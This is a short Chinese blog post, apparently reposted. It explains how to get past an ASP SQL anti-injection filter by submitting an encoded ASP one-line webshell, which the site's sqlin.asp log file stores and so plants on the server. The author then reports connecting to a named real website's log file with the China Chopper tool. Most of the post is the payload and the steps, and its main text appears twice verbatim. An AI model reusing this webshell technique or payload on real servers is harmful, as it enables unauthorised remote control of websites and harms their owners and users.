SQL通用防注入系统asp版漏洞
发布日期:2021-12-12 16:40 | 文章来源:源码之家
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
既然做了记录,再查看了下它的记录文件
于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的
┼攠數畣整爠煥敵瑳∨≡┩愾 密码a(加密方式是: ANSI->Unicode)
提交and 1=┼攠數畣整爠煥敵瑳∨≡┩愾
http://www.jnb1.net/sqlin.asp 菜刀连接之,成功
+----------------------------------------+
其实过程并不难,也没什么技术难度,但是有时遇到这种记录注入错误的网站,多个便捷途径还是不错的。还有,另外百度了下,发现半坑土农民曾经发现了类似的,但是,额,去他博客看时 , 瀑布汗
既然做了记录,再查看了下它的记录文件
于是想着构造个asp一句话写进去,前面几种没加密的都失败了,于是写了个加密的
┼攠數畣整爠煥敵瑳∨≡┩愾 密码a(加密方式是: ANSI->Unicode)
提交and 1=┼攠數畣整爠煥敵瑳∨≡┩愾
http://www.jnb1.net/sqlin.asp 菜刀连接之,成功
+----------------------------------------+
其实过程并不难,也没什么技术难度,但是有时遇到这种记录注入错误的网站,多个便捷途径还是不错的。还有,另外百度了下,发现半坑土农民曾经发现了类似的,但是,额,去他博客看时 , 瀑布汗
版权声明:本站文章来源标注为YINGSOO的内容版权均为本站所有,欢迎引用、转载,请保持原文完整并注明来源及原文链接。禁止复制或仿造本网站,禁止在非www.yingsoo.com所属的服务器上建立镜像,否则将依法追究法律责任。本站部分内容来源于网友推荐、互联网收集整理而来,仅供学习参考,不代表本站立场,如有内容涉嫌侵权,请联系alex-e#qq.com处理。
相关文章
关注官方微信